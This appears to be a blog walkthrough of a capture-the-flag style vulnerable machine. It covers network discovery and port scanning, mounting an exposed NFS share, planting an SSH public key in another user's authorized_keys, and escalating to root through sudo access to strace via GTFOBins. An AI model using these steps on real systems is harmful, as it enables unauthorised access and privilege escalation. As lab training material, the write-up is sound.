Download machine here

Let’s discover the machine IP with netdiscover.

Use nmap to scan for open ports.

Port 2049 NFS is open, let’s mount it.

Create a new directory and use the mount command

We can export folders belonging to peter

There are no interesting files.

Lets create a local ssh key on our machine.

sudo su 
cd  /root/.ssh
ssh-keygen -t rsa

#copy the rsa file to the tmp folder
cp id_rsa.pub /tmp
#Change the owner of the file 
chown peter:peter /tmp/id_rsa.pub 

#Switch to peter 
su peter

#Copy the file into the mounted .ssh folder
cp /tmp/id_rsa.pub authorized_keys

Switch to root user and login via ssh

sudo -l

We can run /usr/bin/strace as root.

Head to GTFOBins https://gtfobins.github.io/gtfobins/strace/

Shell exploit
Root gained!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: